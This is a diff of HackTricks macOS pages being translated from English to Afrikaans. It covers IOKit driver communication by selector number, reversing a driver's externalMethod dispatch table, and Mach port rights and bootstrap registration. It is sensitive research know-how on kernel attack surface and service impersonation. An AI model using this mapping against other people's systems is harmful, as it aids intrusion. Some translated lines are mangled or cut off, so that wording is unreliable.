-In IORegistryExplorer, "planes" are used to organize and display the relationships between different objects in the IORegistry. Each plane represents a specific type of relationship or a particular view of the system's hardware and driver configuration. Here are some of the common planes you might encounter in IORegistryExplorer: +In IORegistryExplorer word "vlakke" gebruik om die verhoudings tussen verskillende voorwerpe in die IORegistry te organiseer en te vertoon. Elke vlak verteenwoordig 'n spesifieke tipe verhouding of 'n spesifieke aansig van die stelsel se hardeware- en drywerkonfigurasie. Hier is 'n paar van die algemene vlakke wat jy in IORegistryExplorer mag teëkom: -1. **IOService Plane**: This is the most general plane, displaying the service objects that represent drivers and nubs (communication channels between drivers). It shows the provider-client relationships between these objects. -2. **IODeviceTree Plane**: This plane represents the physical connections between devices as they are attached to the system. It is often used to visualize the hierarchy of devices connected via buses like USB or PCI. -3. **IOPower Plane**: Displays objects and their relationships in terms of power management. It can show which objects are affecting the power state of others, useful for debugging power-related issues. -4. **IOUSB Plane**: Specifically focused on USB devices and their relationships, showing the hierarchy of USB hubs and connected devices. -5. **IOAudio Plane**: This plane is for representing audio devices and their relationships within the system. +1. **IOService-vlak**: Dit is die algemeenste vlak wat diensvoorwerpe vertoon wat drywers en nubs (kommunikasiekanale tussen drywers) voorstel. Dit toon die verskaffer-kliëntverhoudings tussen hierdie voorwerpe. +2. **IODeviceTree-vlak**: Hierdie vlak verteenwoordig die fisiese verbindings tussen toestelle soos hulle aan die stelsel gekoppel is. Dit word dikwels gebruik om die hiërargie van toestelle wat via busse soos USB of PCI gekoppel is, te visualiseer. +3. **IOPower-vlak**: Vertoon voorwerpe en hul verhoudings in terme van kragbestuur. Dit kan wys watter voorwerpe die kragtoestand van ander beïnvloed, wat nuttig is vir die opspoor van kragverwante probleme. +4. **IOUSB-vlak**: Spesifiek gefokus op USB-toestelle en hul verhoudings, wat die hiërargie van USB-hubs en gekoppelde toestelle vertoon. +5. **IOAudio-vlak**: Hierdie vlak is vir die verteenwoordiging van klanktoestelle en hul verhoudings binne die stelsel. 6. ... -## Driver Comm Code Example +## Voorbeeld van drywerkommunikasiekode -The following code connects to the IOKit service `"YourServiceNameHere"` and calls the function inside the selector 0. For it: - -* it first calls **`IOServiceMatching`** and **`IOServiceGetMatchingServices`** to get the service. -* It then establish a connection calling **`IOServiceOpen`**. -* And it finally calls a function with **`IOConnectCallScalarMethod`** indicating the selector 0 (the selector is the number the function you want to call has assigned). +Die volgende kode maak verbinding met die IOKit-diens `"YourServiceNameHere"` en roep die funksie binne die selektor 0 aan. Hiervoor: +* roep dit eers **`IOServiceMatching`** en **`IOServiceGetMatchingServices`** aan om die diens te kry. +* Dit vestig dan 'n verbinding deur **`IOServiceOpen`** te roep. +* En dit roep uiteindelik 'n funksie aan met **`IOConnectCallScalarMethod`** wat die selektor 0 aandui (die selektor is die nommer wat aan die funksie wat jy wil oproep, toegeken is). ```objectivec #import #import int main(int argc, const char * argv[]) { - @autoreleasepool { - // Get a reference to the service using its name - CFMutableDictionaryRef matchingDict = IOServiceMatching("YourServiceNameHere"); - if (matchingDict == NULL) { - NSLog(@"Failed to create matching dictionary"); - return -1; - } - - // Obtain an iterator over all matching services - io_iterator_t iter; - kern_return_t kr = IOServiceGetMatchingServices(kIOMasterPortDefault, matchingDict, &iter); - if (kr != KERN_SUCCESS) { - NSLog(@"Failed to get matching services"); - return -1; - } - - // Get a reference to the first service (assuming it exists) - io_service_t service = IOIteratorNext(iter); - if (!service) { - NSLog(@"No matching service found"); - IOObjectRelease(iter); - return -1; - } - - // Open a connection to the service - io_connect_t connect; - kr = IOServiceOpen(service, mach_task_self(), 0, &connect); - if (kr != KERN_SUCCESS) { - NSLog(@"Failed to open service"); - IOObjectRelease(service); - IOObjectRelease(iter); - return -1; - } - - // Call a method on the service - // Assume the method has a selector of 0, and takes no arguments - kr = IOConnectCallScalarMethod(connect, 0, NULL, 0, NULL, NULL); - if (kr != KERN_SUCCESS) { - NSLog(@"Failed to call method"); - } - - // Cleanup - IOServiceClose(connect); - IOObjectRelease(service); - IOObjectRelease(iter); - } - return 0; +@autoreleasepool { +// Get a reference to the service using its name +CFMutableDictionaryRef matchingDict = IOServiceMatching("YourServiceNameHere"); +if (matchingDict == NULL) { +NSLog(@"Failed to create matching dictionary"); +return -1; +} + +// Obtain an iterator over all matching services +io_iterator_t iter; +kern_return_t kr = IOServiceGetMatchingServices(kIOMasterPortDefault, matchingDict, &iter); +if (kr != KERN_SUCCESS) { +NSLog(@"Failed to get matching services"); +return -1; +} + +// Get a reference to the first service (assuming it exists) +io_service_t service = IOIteratorNext(iter); +if (!service) { +NSLog(@"No matching service found"); +IOObjectRelease(iter); +return -1; +} + +// Open a connection to the service +io_connect_t connect; +kr = IOServiceOpen(service, mach_task_self(), 0, &connect); +if (kr != KERN_SUCCESS) { +NSLog(@"Failed to open service"); +IOObjectRelease(service); +IOObjectRelease(iter); +return -1; +} + +// Call a method on the service +// Assume the method has a selector of 0, and takes no arguments +kr = IOConnectCallScalarMethod(connect, 0, NULL, 0, NULL, NULL); +if (kr != KERN_SUCCESS) { +NSLog(@"Failed to call method"); +} + +// Cleanup +IOServiceClose(connect); +IOObjectRelease(service); +IOObjectRelease(iter); +} +return 0; } ``` +Daar is **ander** funksies wat gebruik kan word om IOKit funksies aan te roep, afgesien van **`IOConnectCallScalarMethod`** soos **`IOConnectCallMethod`**, **`IOConnectCallStructMethod`**... -There are **other** functions that can be used to call IOKit functions apart of **`IOConnectCallScalarMethod`** like **`IOConnectCallMethod`**, **`IOConnectCallStructMethod`**... +## Omkeer van bestuurder se intreepunt -## Reversing driver entrypoint +Jy kan dit byvoorbeeld verkry vanaf 'n [**firmware-beeld (ipsw)**](./#ipsw). Laai dit dan in jou gunsteling dekompiler. -You could obtain these for example from a [**firmware image (ipsw)**](./#ipsw). Then, load it into your favourite decompiler. - -You could start decompiling the **`externalMethod`** function as this is the driver function that will be receiving the call and calling the correct function: +Jy kan begin dekompilering van die **`externalMethod`** funksie aangesien dit die bestuursfunksie is wat die oproep sal ontvang en die korrekte funksie sal aanroep:
-That awful call demagled means: +Daardie afgryslike oproep beteken: {% code overflow="wrap" %} ```cpp @@ -193,7 +181,7 @@ IOUserClient2022::dispatchExternalMethod(unsigned int, IOExternalMethodArguments ``` {% endcode %} -Note how in the previous definition the **`self`** param is missed, the good definition would be: +Let op hoe in die vorige definisie die **`self`** parameter weggelaat is, die goeie definisie sou wees: {% code overflow="wrap" %} ```cpp @@ -201,58 +189,56 @@ IOUserClient2022::dispatchExternalMethod(self, unsigned int, IOExternalMethodArg ``` {% endcode %} -Actually, you can find the real definition in [https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388): - +Eintlik kan jy die werklike definisie vind by [https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388): ```cpp IOUserClient2022::dispatchExternalMethod(uint32_t selector, IOExternalMethodArgumentsOpaque *arguments, - const IOExternalMethodDispatch2022 dispatchArray[], size_t dispatchArrayCount, - OSObject * target, void * reference) +const IOExternalMethodDispatch2022 dispatchArray[], size_t dispatchArrayCount, +OSObject * target, void * reference) ``` - -With this info you can rewrite Ctrl+Right -> `Edit function signature` and set the known types: +Met hierdie inligting kan jy Ctrl+Right herskryf -> `Wysig funksie handtekening` en stel die bekende tipes in:
-The new decompiled code will look like: +Die nuwe gedekomponeerde kode sal lyk soos:
-For the next step we need to have defined the **`IOExternalMethodDispatch2022`** struct. It's opensource in [https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176), you could define it: +Vir die volgende stap moet ons die **`IOExternalMethodDispatch2022`** struktuur gedefinieer hê. Dit is oopbron in [https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176), jy kan dit definieer:
-Now, following the `(IOExternalMethodDispatch2022 *)&sIOExternalMethodArray` you can see a lot of data: +Nou, volgens die `(IOExternalMethodDispatch2022 *)&sIOExternalMethodArray` kan jy baie data sien:
-Change the Data Type to **`IOExternalMethodDispatch2022:`** +Verander die Data Tipe na **`IOExternalMethodDispatch2022:`**
-after the change: +na die verandering:
-And as we now in there we have an **array of 7 elements** (check the final decompiled code), click to create an array of 7 elements: +En soos ons nou weet, het ons 'n **array van 7 elemente** (kontroleer die finale gedekomponeerde kode), klik om 'n array van 7 elemente te skep:
-After the array is created you can see all the exported functions: +Nadat die array geskep is, kan jy al die uitgevoerde funksies sien:
{% hint style="success" %} -If you remember, to **call** an **exported** function from user space we don't need to call the name of the function, but the **selector number**. Here you can see that the selector **0** is the function **`initializeDecoder`**, the selector **1** is **`startDecoder`**, the selector **2** **`initializeEncoder`**... +As jy onthou, om 'n uitgevoerde funksie vanuit gebruikersruimte te **roep**, hoef ons nie die naam van die funksie te noem nie, maar die **selekteernommer**. Hier kan jy sien dat die selekteerder **0** die funksie **`initializeDecoder`** is, die selekteerder **1** is **`startDecoder`**, die selekteerder **2** is **`initializeEncoder`**... {% endhint %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! -* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) -* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com) -* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). -* **Comparte tus trucos de hacking enviando PR a** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy vir 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer op HackTricks**? Of wil jy toegang hê tot die **laaste weergawe van PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons eksklusiewe versameling van [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS- en HackTricks-swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) **Discord-groep** of die [**telegramgroep**](https://t.me/peass) of **volg my** op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). +* **Deel jou hacking-truuks deur 'n PR te stuur na** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md index be63575e5..45a398eff 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md @@ -1,119 +1,115 @@ -# macOS IPC - Inter Process Communication +# macOS IPC - Interproses Kommunikasie
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Mach messaging via Ports +## Mach-boodskappe via Poorte -### Basic Information +### Basiese Inligting -Mach uses **tasks** as the **smallest unit** for sharing resources, and each task can contain **multiple threads**. These **tasks and threads are mapped 1:1 to POSIX processes and threads**. +Mach gebruik **take** as die **kleinste eenheid** vir die deel van hulpbronne, en elke taak kan **veral threads** bevat. Hierdie **take en threads word 1:1 gekarteer na POSIX-prosesse en threads**. -Communication between tasks occurs via Mach Inter-Process Communication (IPC), utilising one-way communication channels. **Messages are transferred between ports**, which act like **message queues** managed by the kernel. +Kommunikasie tussen take vind plaas via Mach Inter-Process Communication (IPC), wat eenrigting kommunikasiekanale gebruik. **Boodskappe word oorgedra tussen poorte**, wat optree as **boodskap-ueue** wat deur die kernel bestuur word. -Each process has an **IPC table**, in there it's possible to find the **mach ports of the process**. The name of a mach port is actually a number (a pointer to the kernel object). +Elke proses het 'n **IPC-tabel**, waarin dit moontlik is om die **mach-poorte van die proses** te vind. Die naam van 'n mach-poort is eintlik 'n nommer ( 'n verwysing na die kernel-objek). -A process can also send a port name with some rights **to a different task** and the kernel will make this entry in the **IPC table of the other task** appear. +'n Proses kan ook 'n poortnaam met sekere regte **na 'n ander taak stuur** en die kernel sal hierdie inskrywing in die **IPC-tabel van die ander taak** laat verskyn. -### Port Rights +### Poortregte -Port rights, which define what operations a task can perform, are key to this communication. The possible **port rights** are ([definitions from here](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)): +Poortregte, wat bepaal watter operasies 'n taak kan uitvoer, is sleutel tot hierdie kommunikasie. Die moontlike **poortregte** is ([definisies van hier](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)): -* **Receive right**, which allows receiving messages sent to the port. Mach ports are MPSC (multiple-producer, single-consumer) queues, which means that there may only ever be **one receive right for each port** in the whole system (unlike with pipes, where multiple processes can all hold file descriptors to the read end of one pipe). - * A **task with the Receive** right can receive messages and **create Send rights**, allowing it to send messages. Originally only the **own task has Receive right over its por**t. -* **Send right**, which allows sending messages to the port. - * The Send right can be **cloned** so a task owning a Send right can clone the right and **grant it to a third task**. -* **Send-once right**, which allows sending one message to the port and then disappears. -* **Port set right**, which denotes a _port set_ rather than a single port. Dequeuing a message from a port set dequeues a message from one of the ports it contains. Port sets can be used to listen on several ports simultaneously, a lot like `select`/`poll`/`epoll`/`kqueue` in Unix. -* **Dead name**, which is not an actual port right, but merely a placeholder. When a port is destroyed, all existing port rights to the port turn into dead names. +* **Ontvangsreg**, wat die ontvangs van boodskappe wat na die poort gestuur is, moontlik maak. Mach-poorte is MPSC (veelvuldige produsent, enkelverbruiker)ueue, wat beteken dat daar slegs **een ontvangsreg vir elke poort** in die hele stelsel kan wees (in teenstelling met pype, waar verskeie prosesse almal lêerbeskrywers na die leesuiteinde van een pyp kan hê). +* 'n **Taak met die Ontvangsreg** kan boodskappe ontvang en **Sendregte skep**, wat dit moontlik maak om boodskappe te stuur. Aanvanklik het slegs die **eie taak Ontvangsreg oor sy poort**. +* **Sendreg**, wat dit moontlik maak om boodskappe na die poort te stuur. +* Die Sendreg kan **gekloneer** word sodat 'n taak wat 'n Sendreg besit, die reg kan kloon en **aan 'n derde taak kan toeken**. +* **Send-once-reg**, wat dit moontlik maak om een boodskap na die poort te stuur en dan te verdwyn. +* **Poortstelreg**, wat 'n _poortstel_ aandui eerder as 'n enkele poort. Deur 'n boodskap uit 'n poortstel te ontkoppel, word 'n boodskap uit een van die poorte wat dit bevat, ontkoppel. Poortstelle kan gebruik word om gelyktydig na verskeie poorte te luister, soos `select`/`poll`/`epoll`/`kqueue` in Unix. +* **Dooie naam**, wat nie 'n werklike poortreg is nie, maar bloot 'n plasinghouer. Wanneer 'n poort vernietig word, verander alle bestaande poortregte na die poort in dooie name. -**Tasks can transfer SEND rights to others**, enabling them to send messages back. **SEND rights can also be cloned, so a task can duplicate and give the right to a third task**. This, combined with an intermediary process known as the **bootstrap server**, allows for effective communication between tasks. +**Take kan SEND-regte aan ander oordra**, sodat hulle boodskappe kan terugstuur. **SEND-regte kan ook gekloneer word**, sodat 'n taak die reg kan dupliseer en aan 'n derde taak kan gee. Dit, saam met 'n tussenliggende proses wat bekend staan as die **bootstrap-bediener**, maak effektiewe kommunikasie tussen take moontlik. -### Establishing a communication +### Die vestiging van 'n kommunikasie -#### Steps: +#### Stappe: -As it's mentioned, in order to establish the communication channel, the **bootstrap server** (**launchd** in mac) is involved. +Soos genoem, is die **bootstrap-bediener** (**launchd** in Mac) betrokke by die vestiging van die kommunikasiekanaal. -1. Task **A** initiates a **new port**, obtaining a **RECEIVE right** in the process. -2. Task **A**, being the holder of the RECEIVE right, **generates a SEND right for the port**. -3. Task **A** establishes a **connection** with the **bootstrap server**, providing the **port's service name** and the **SEND right** through a procedure known as the bootstrap register. -4. Task **B** interacts with the **bootstrap server** to execute a bootstrap **lookup for the service** name. If successful, the **server duplicates the SEND right** received from Task A and **transmits it to Task B**. -5. Upon acquiring a SEND right, Task **B** is capable of **formulating** a **message** and dispatching it **to Task A**. -6. For a bi-directional communication usually task **B** generates a new port with a **RECEIVE** right and a **SEND** right, and gives the **SEND right to Task A** so it can send messages to TASK B (bi-directional communication). +1. Taak **A** begin 'n **nuwe poort** en verkry 'n **ONTVANG-reg** in die proses. +2. Taak **A**, as die houer van die ONTVANG-reg, **genereer 'n SEND-reg vir die poort**. +3. Taak **A** vestig 'n **verbinding** met die **bootstrap-bediener**, deur die **diensnaam van die poort** en die **SEND-reg** te voorsien deur middel van 'n prosedure wat bekend staan as die bootstrap-registrasie. +4. Taak **B** interaksie met die **bootstrap-bediener** om 'n bootstrap **soektog na die diensnaam** uit te voer. As dit suksesvol is, **dupliseer die bediener die ontvangde SEND-reg** van Taak A en **stuur dit na Taak B**. +5. Nadat Taak **B** 'n SEND-reg bekom het, is dit in staat om 'n **boodskap te formuleer** en dit **na Taak A** te stuur. +6. Vir 'n tweerigtingkommunikasie genereer taak **B** gewoonlik 'n nuwe poort met 'n **ONTVANG-reg** en 'n **SEND-reg**, en gee die **SEND-reg aan Taak A** sodat dit boodskappe na Taak B kan stuur (tweerigtingkommunikasie). -The bootstrap server **cannot authenticate** the service name claimed by a task. This means a **task** could potentially **impersonate any system task**, such as falsely **claiming an authorization service name** and then approving every request. +Die bootstrap-bediener kan die diensnaam wat deur 'n taak beweer word, **nie outentiseer nie**. Dit beteken dat 'n **taak potensieel enige stelseltaak kan naboots**, soos valse **bewering van 'n outorisasiediensnaam** en dan elke versoek goedkeur. -Then, Apple stores the **names of system-provided services** in secure configuration files, located in **SIP-protected** directories: `/System/Library/LaunchDaemons` and `/System/Library/LaunchAgents`. Alongside each service name, the **associated binary is also stored**. The bootstrap server, will create and hold a **RECEIVE right for each of these service names**. +Apple stoor dan die **name van stelselverskafte dienste** in veilige konfigurasie lêers, wat in **SIP-beskermde** gids: `/System/Library/LaunchDaemons` en `/System/Library/LaunchAgents`, geleë is. Saam met elke diensnaam word die **geassosieerde binêre lêer ook gestoor**. Die bootstrap-bediener sal vir elkeen van hierdie diensname 'n **ONTVANG-reg skep en behou**. -For these predefined services, the **lookup process differs slightly**. When a service name is being looked up, launchd starts the service dynamically. The new workflow is as follows: +Vir hierdie voorgedefinieerde dienste verskil die **soektogproses effens**. Wanneer 'n diensnaam opgesoek word, begin launchd die diens dinamies. Die nuwe werkstroom is as volg: -* Task **B** initiates a bootstrap **lookup** for a service name. -* **launchd** checks if the task is running and if it isn’t, **starts** it. -* Task **A** (the service) performs a **bootstrap check-in**. Here, the **bootstrap** server creates a SEND right, retains it, and **transfers the RECEIVE right to Task A**. -* launchd duplicates the **SEND right and sends it to Task B**. -* Task **B** generates a new port with a **RECEIVE** right and a **SEND** right, and gives the **SEND right to Task A** (the svc) so it can send messages to TASK B (bi-directional communication). +* Taak **B** begin 'n bootstrap **soektog** vir 'n diensnaam. +* **launchd** kyk of die taak loop en as dit nie is nie, **begin** dit dit. +* Taak **A** (die diens) voer 'n **bootstrap check-in** uit. Hier skep die **bootstrap**-bediener 'n SEND-reg, behou dit, en **oorhandig die ONTVANG-reg aan Taak A**. +* launchd dupliseer die **SEND-reg en stuur dit na Taak B**. +* Taak **B** genereer 'n nuwe poort met 'n **ONTVANG-reg** en 'n **SEND-reg**, en gee die **SEND-reg aan Taak A** (die diens) sodat dit boodskappe na Taak B kan stuur (tweerigtingkommunikasie). -However, this process only applies to predefined system tasks. Non-system tasks still operate as described originally, which could potentially allow for impersonation. +Hierdie proses geld egter slegs vir voorgedefinieerde stelseltake. Nie-stelsel take werk steeds soos oorspronklik beskryf, wat potensieel die moontlikheid van nabootsing toelaat. -### A Mach Message +### 'n Mach-boodskap -[Find more info here](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/) - -The `mach_msg` function, essentially a system call, is utilized for sending and receiving Mach messages. The function requires the message to be sent as the initial argument. This message must commence with a `mach_msg_header_t` structure, succeeded by the actual message content. The structure is defined as follows: +[Vind meer inligting hier](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/) +Die `mach_msg`-funksie, essensieel 'n stelseloproep, word gebruik om Mach-boodskappe te stuur en te ontvang. Die funksie vereis dat die boodskap as die aan ```c typedef struct { - mach_msg_bits_t msgh_bits; - mach_msg_size_t msgh_size; - mach_port_t msgh_remote_port; - mach_port_t msgh_local_port; - mach_port_name_t msgh_voucher_port; - mach_msg_id_t msgh_id; +mach_msg_bits_t msgh_bits; +mach_msg_size_t msgh_size; +mach_port_t msgh_remote_port; +mach_port_t msgh_local_port; +mach_port_name_t msgh_voucher_port; +mach_msg_id_t msgh_id; } mach_msg_header_t; ``` +Prosesse wat 'n _**ontvangsreg**_ besit, kan boodskappe op 'n Mach-poort ontvang. Omgekeerd word aan die **senders** 'n _**stuur**_ of 'n _**stuur-eenmaal-reg**_ toegeken. Die stuur-eenmaal-reg is slegs vir die stuur van 'n enkele boodskap, waarna dit ongeldig word. -Processes possessing a _**receive right**_ can receive messages on a Mach port. Conversely, the **senders** are granted a _**send**_ or a _**send-once right**_. The send-once right is exclusively for sending a single message, after which it becomes invalid. - -In order to achieve an easy **bi-directional communication** a process can specify a **mach port** in the mach **message header** called the _reply port_ (**`msgh_local_port`**) where the **receiver** of the message can **send a reply** to this message. The bitflags in **`msgh_bits`** can be used to **indicate** that a **send-once** **right** should be derived and transferred for this port (`MACH_MSG_TYPE_MAKE_SEND_ONCE`). +Om 'n maklike **tweerigting-kommunikasie** te bewerkstellig, kan 'n proses 'n **mach-poort** in die mach **boodskapkop** spesifiseer wat die _antwoordpoort_ (**`msgh_local_port`**) genoem word, waar die **ontvanger** van die boodskap 'n antwoord na hierdie boodskap kan stuur. Die bitvlaggies in **`msgh_bits`** kan gebruik word om aan te dui dat 'n **stuur-eenmaal-reg** afgelei en oorgedra moet word vir hierdie poort (`MACH_MSG_TYPE_MAKE_SEND_ONCE`). {% hint style="success" %} -Note that this kind of bi-directional communication is used in XPC messages that expect a replay (`xpc_connection_send_message_with_reply` and `xpc_connection_send_message_with_reply_sync`). But **usually different ports are created** as explained previously to create the bi-directional communication. +Let daarop dat hierdie soort tweerigting-kommunikasie gebruik word in XPC-boodskappe wat 'n antwoord verwag (`xpc_connection_send_message_with_reply` en `xpc_connection_send_message_with_reply_sync`). Maar **gewoonlik word verskillende poorte geskep** soos vantevore verduidelik om die tweerigting-kommunikasie te skep. {% endhint %} -The other fields of the message header are: +Die ander velde van die boodskapkop is: -* `msgh_size`: the size of the entire packet. -* `msgh_remote_port`: the port on which this message is sent. -* `msgh_voucher_port`: [mach vouchers](https://robert.sesek.com/2023/6/mach\_vouchers.html). -* `msgh_id`: the ID of this message, which is interpreted by the receiver. +* `msgh_size`: die grootte van die hele pakkie. +* `msgh_remote_port`: die poort waarop hierdie boodskap gestuur word. +* `msgh_voucher_port`: [mach-vouchers](https://robert.sesek.com/2023/6/mach\_vouchers.html). +* `msgh_id`: die ID van hierdie boodskap, wat deur die ontvanger geïnterpreteer word. {% hint style="danger" %} -Note that **mach messages are sent over a **_**mach port**_, which is a **single receiver**, **multiple sender** communication channel built into the mach kernel. **Multiple processes** can **send messages** to a mach port, but at any point only **a single process can read** from it. +Let daarop dat **mach-boodskappe oor 'n **_**mach-poort**_ gestuur word, wat 'n **enkele ontvanger**, **veelvuldige sender**-kommunikasiekanaal is wat in die mach-kernel ingebou is. **Veelvuldige prosesse** kan **boodskappe stuur** na 'n mach-poort, maar op enige punt kan slegs **'n enkele proses** dit lees. {% endhint %} -### Enumerate ports - +### Enumereer poorte ```bash lsmp -p ``` +Jy kan hierdie instrument in iOS installeer deur dit af te laai vanaf [http://newosxbook.com/tools/binpack64-256.tar.gz](http://newosxbook.com/tools/binpack64-256.tar.gz) -You can install this tool in iOS downloading it from [http://newosxbook.com/tools/binpack64-256.tar.gz ](http://newosxbook.com/tools/binpack64-256.tar.gz) +### Kodevoorbeeld -### Code example - -Note how the **sender** **allocates** a port, create a **send right** for the name `org.darlinghq.example` and send it to the **bootstrap server** while the sender asked for the **send right** of that name and used it to **send a message**. +Merk op hoe die **sender** 'n poort toewys, 'n **send right** skep vir die naam `org.darlinghq.example` en dit na die **bootstrap server** stuur terwyl die sender die **send right** van daardie naam gevra het en dit gebruik het om 'n boodskap te stuur. {% tabs %} {% tab title="receiver.c" %} @@ -127,64 +123,107 @@ Note how the **sender** **allocates** a port, create a **send right** for the na int main() { - // Create a new port. - mach_port_t port; - kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); - if (kr != KERN_SUCCESS) { - printf("mach_port_allocate() failed with code 0x%x\n", kr); - return 1; - } - printf("mach_port_allocate() created port right name %d\n", port); +// Create a new port. +mach_port_t port; +kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); +if (kr != KERN_SUCCESS) { +printf("mach_port_allocate() failed with code 0x%x\n", kr); +return 1; +} +printf("mach_port_allocate() created port right name %d\n", port); - // Give us a send right to this port, in addition to the receive right. - kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); - if (kr != KERN_SUCCESS) { - printf("mach_port_insert_right() failed with code 0x%x\n", kr); - return 1; - } - printf("mach_port_insert_right() inserted a send right\n"); +// Give us a send right to this port, in addition to the receive right. +kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); +if (kr != KERN_SUCCESS) { +printf("mach_port_insert_right() failed with code 0x%x\n", kr); +return 1; +} +printf("mach_port_insert_right() inserted a send right\n"); - // Send the send right to the bootstrap server, so that it can be looked up by other processes. - kr = bootstrap_register(bootstrap_port, "org.darlinghq.example", port); - if (kr != KERN_SUCCESS) { - printf("bootstrap_register() failed with code 0x%x\n", kr); - return 1; - } - printf("bootstrap_register()'ed our port\n"); +// Send the send right to the bootstrap server, so that it can be looked up by other processes. +kr = bootstrap_register(bootstrap_port, "org.darlinghq.example", port); +if (kr != KERN_SUCCESS) { +printf("bootstrap_register() failed with code 0x%x\n", kr); +return 1; +} +printf("bootstrap_register()'ed our port\n"); - // Wait for a message. - struct { - mach_msg_header_t header; - char some_text[10]; - int some_number; - mach_msg_trailer_t trailer; - } message; +// Wait for a message. +struct { +mach_msg_header_t header; +char some_text[10]; +int some_number; +mach_msg_trailer_t trailer; +} message; - kr = mach_msg( - &message.header, // Same as (mach_msg_header_t *) &message. - MACH_RCV_MSG, // Options. We're receiving a message. - 0, // Size of the message being sent, if sending. - sizeof(message), // Size of the buffer for receiving. - port, // The port to receive a message on. - MACH_MSG_TIMEOUT_NONE, - MACH_PORT_NULL // Port for the kernel to send notifications about this message to. - ); - if (kr 